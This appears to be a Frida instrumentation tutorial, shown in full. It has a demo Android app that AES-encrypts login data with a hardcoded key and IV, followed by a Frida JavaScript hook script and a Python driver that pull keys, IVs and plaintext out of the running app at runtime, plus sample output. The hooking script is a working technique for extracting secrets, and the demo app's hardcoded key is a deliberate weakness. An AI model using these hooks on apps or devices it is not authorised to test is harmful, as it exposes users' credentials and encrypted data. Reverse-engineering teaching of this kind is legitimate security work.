import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class my_activity extends AppCompatActivity {
    EditText username_et;
    EditText password_et;
    TextView message_tv;
    HttpURLConnection conn;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_my_activity);
        message_tv = ((TextView) findViewById(R.id.textView));
        username_et = (EditText) findViewById(R.id.editText);
        password_et = (EditText) findViewById(R.id.editText2);
        ((Button) findViewById(R.id.button)).setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                send_data(username_et.getText() + ":" + password_et.getText());
            }
        });

    }

    void send_data(final String data) {
        URL url = null;
        try {
            url = new URL("http://192.168.18.134");
            final HttpURLConnection conn = (HttpURLConnection) url.openConnection();
            conn.setRequestMethod("POST");
            conn.setDoOutput(true);
            new Thread(new Runnable() {
                @Override
                public void run() {
                    try {
                        DataOutputStream out = new DataOutputStream(conn.getOutputStream());
                        out.writeBytes(enc(data));
                        BufferedReader in = new BufferedReader(new InputStreamReader(conn.getInputStream()));
                        final String text = in.readLine();
                        runOnUiThread(new Runnable() {
                            @Override
                            public void run() {
                                ((TextView) findViewById(R.id.textView)).setText(text);
                                dec(text);
                            }
                        });
                    } catch (IOException e) {
                        e.printStackTrace();
                    }
                }
            }).start();

        } catch (MalformedURLException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        }

    }

    String enc(String data) {
        try {
            String pre_shared_key = "aaaaaaaaaaaaaaaa"; //assume that this key was not hardcoded
            String generated_iv = "bbbbbbbbbbbbbbbb";
            Cipher my_cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING");
            my_cipher.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(pre_shared_key.getBytes("UTF-8"), "AES"), new IvParameterSpec(generated_iv.getBytes("UTF-8")));
            byte[] x = my_cipher.doFinal(data.getBytes());

            System.out.println(new String(Base64.encode(x, Base64.DEFAULT)));
            return new String(Base64.encode(x, Base64.DEFAULT));
        } catch (NoSuchAlgorithmException e) {
            e.printStackTrace();
        } catch (InvalidKeyException e) {
            e.printStackTrace();
        } catch (InvalidAlgorithmParameterException e) {
            e.printStackTrace();
        } catch (NoSuchPaddingException e) {
            e.printStackTrace();
        } catch (BadPaddingException e) {
            e.printStackTrace();
        } catch (UnsupportedEncodingException e) {
            e.printStackTrace();
        } catch (IllegalBlockSizeException e) {
            e.printStackTrace();
        }
        return null;
    }

    String dec(String data) {
        try {
            byte[] decoded_data = Base64.decode(data.getBytes(), Base64.DEFAULT);
            String pre_shared_key = "aaaaaaaaaaaaaaaa"; //assume that this key was not hardcoded
            String generated_iv = "bbbbbbbbbbbbbbbb";
            Cipher my_cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING");
            my_cipher.init(Cipher.DECRYPT_MODE, new SecretKeySpec(pre_shared_key.getBytes("UTF-8"), "AES"), new IvParameterSpec(generated_iv.getBytes("UTF-8")));
            String plain = new String(my_cipher.doFinal(decoded_data));
            return plain;
        } catch (UnsupportedEncodingException e) {
            e.printStackTrace();
        } catch (NoSuchPaddingException e) {
            e.printStackTrace();
        } catch (InvalidAlgorithmParameterException e) {
            e.printStackTrace();
        } catch (NoSuchAlgorithmException e) {
            e.printStackTrace();
        } catch (InvalidKeyException e) {
            e.printStackTrace();
        } catch (BadPaddingException e) {
            e.printStackTrace();
        } catch (IllegalBlockSizeException e) {
            e.printStackTrace();
        }
        return "";
    }
}

The application uses AES cipher in CBC mode to decrypt and encrypt data, encrypted data is to sent to a HTTP server using POST request, data received from the server is decrypted and never displayed.

The keys are hardcoded in the app, in real world applications they won’t, they should be transmitted securely over the network at runtime.

So our goal is to get the crypto keys while they are being used (after being transferred from the remote servers in real world apps).

The JS code:

console.log("Script loaded successfully 55");


Java.perform(function x() {
    var secret_key_spec = Java.use("javax.crypto.spec.SecretKeySpec");
    //SecretKeySpec is inistantiated with the bytes of the key, so we hook the constructor and get the bytes of the key from it
    //We will get the key but we won't know what data is decrypted/encrypted with it
    secret_key_spec.$init.overload("[B", "java.lang.String").implementation = function (x, y) {
        send('{"my_type" : "KEY"}', new Uint8Array(x));
        //console.log(xx.join(" "))
        return this.$init(x, y);
    }
    //hooking IvParameterSpec's constructor to get the IV as we got the key above.
    var iv_parameter_spec = Java.use("javax.crypto.spec.IvParameterSpec");
    iv_parameter_spec.$init.overload("[B").implementation = function (x) {
        send('{"my_type" : "IV"}', new Uint8Array(x));
        return this.$init(x);
    }
    //now we will hook init function in class Cipher, we will be able to tie keys,IVs with Cipher objects
    var cipher = Java.use("javax.crypto.Cipher");
    cipher.init.overload("int", "java.security.Key", "java.security.spec.AlgorithmParameterSpec").implementation = function (x, y, z) {
        //console.log(z.getClass()); 
        if (x == 1) // 1 means Cipher.MODE_ENCRYPT
            send('{"my_type" : "hashcode_enc", "hashcode" :"' + this.hashCode().toString() + '" }');
        else // In this android app it is either 1 (Cipher.MODE_ENCRYPT) or 2 (Cipher.MODE_DECRYPT)
            send('{"my_type" : "hashcode_dec", "hashcode" :"' + this.hashCode().toString() + '" }');
        //We will have two lists in the python code, which keep track of the Cipher objects and their modes.


        //Also we can obtain the key,iv from the args passed to init call
        send('{"my_type" : "Key from call to cipher init"}', new Uint8Array(y.getEncoded()));
        //arg z is of type AlgorithmParameterSpec, we need to cast it to IvParameterSpec first to be able to call getIV function
        send('{"my_type" : "IV from call to cipher init"}', new Uint8Array(Java.cast(z, iv_parameter_spec).getIV()));
        //init must be called this way to work properly
        return cipher.init.overload("int", "java.security.Key", "java.security.spec.AlgorithmParameterSpec").call(this, x, y, z);

    }
    //now hooking the doFinal method to intercept the enc/dec process
    //the mode specified in the previous init call specifies whether this Cipher object will decrypt or encrypt, there is no functions like cipher.getopmode() that we can use to get the operation mode of the object (enc or dec)
    //so we will send the data before and after the call to the python code, where we will decide which one of them is cleartext data
    //if the object will encrypt, so the cleartext data is availabe in the argument before the call, else if the object will decrypt, we need to send the data returned from the doFinal call and discard the data sent before the call
    cipher.doFinal.overload("[B").implementation = function (x) {
        send('{"my_type" : "before_doFinal" , "hashcode" :"' + this.hashCode().toString() + '" }', new Uint8Array(x));
        var ret = cipher.doFinal.overload("[B").call(this, x);
        send('{"my_type" : "after_doFinal" , "hashcode" :"' + this.hashCode().toString() + '" }', new Uint8Array(ret));

        return ret;
    }
});

The python code

import time
import frida
import json
enc_cipher_hashcodes = [] #cipher objects with Cipher.ENCRYPT_MODE will be stored here
dec_cipher_hashcodes = [] #cipher objects with Cipher.ENCRYPT_MODE will be stored here


def my_message_handler(message, payload):
    #mainly printing the data sent from the js code, and managing the cipher objects according to their operation mode
    if message["type"] == "send":
        # print message["payload"]
        my_json = json.loads(message["payload"])
        if my_json["my_type"] == "KEY":
            print "Key sent to SecretKeySpec()", payload.encode("hex")
        elif my_json["my_type"] == "IV":
            print "Iv sent to IvParameterSpec()", payload.encode("hex")
        elif my_json["my_type"] == "hashcode_enc":
            enc_cipher_hashcodes.append(my_json["hashcode"])
        elif my_json["my_type"] == "hashcode_dec":
            dec_cipher_hashcodes.append(my_json["hashcode"])
        elif my_json["my_type"] == "Key from call to cipher init":
            print "Key sent to cipher init()", payload.encode("hex")
        elif my_json["my_type"] == "IV from call to cipher init":
            print "Iv sent to cipher init()", payload.encode("hex")
        elif my_json["my_type"] == "before_doFinal" and my_json["hashcode"] in enc_cipher_hashcodes:
            #if the cipher object has Cipher.MODE_ENCRYPT as the operation mode, the data before doFinal will be printed
            #and the data returned (ciphertext) will be ignored
            print "Data to be encrypted :", payload
        elif my_json["my_type"] == "after_doFinal" and my_json["hashcode"] in dec_cipher_hashcodes:
            print "Decrypted data :", payload
    else:
        print message
        print '*' * 16
        print payload


device = frida.get_usb_device()
pid = device.spawn(["com.example.a11x256.frida_test"])
device.resume(pid)
time.sleep(1)  # Without it Java.perform silently fails
session = device.attach(pid)

with open("s5.js") as f:
    script = session.create_script(f.read())
script.on("message", my_message_handler)  # register the message handler
script.load()

raw_input()

Output

sample of the output captured when communicating with a local server(included in the files).

Iv sent to cipher init() 62626262626262626262626262626262
Data to be encrypted : 6557:hardcoded_secret_password
Key sent to SecretKeySpec() 61616161616161616161616161616161
Iv sent to IvParameterSpec() 62626262626262626262626262626262
Key sent to cipher init() 61616161616161616161616161616161
Iv sent to cipher init() 62626262626262626262626262626262
Decrypted data : Can you see this secret message too !!!
Key sent to SecretKeySpec() 61616161616161616161616161616161
Iv sent to IvParameterSpec() 62626262626262626262626262626262
Key sent to cipher init() 61616161616161616161616161616161
Iv sent to cipher init() 62626262626262626262626262626262
Decrypted data : Can you see this secret message too !!!

Files

Example 5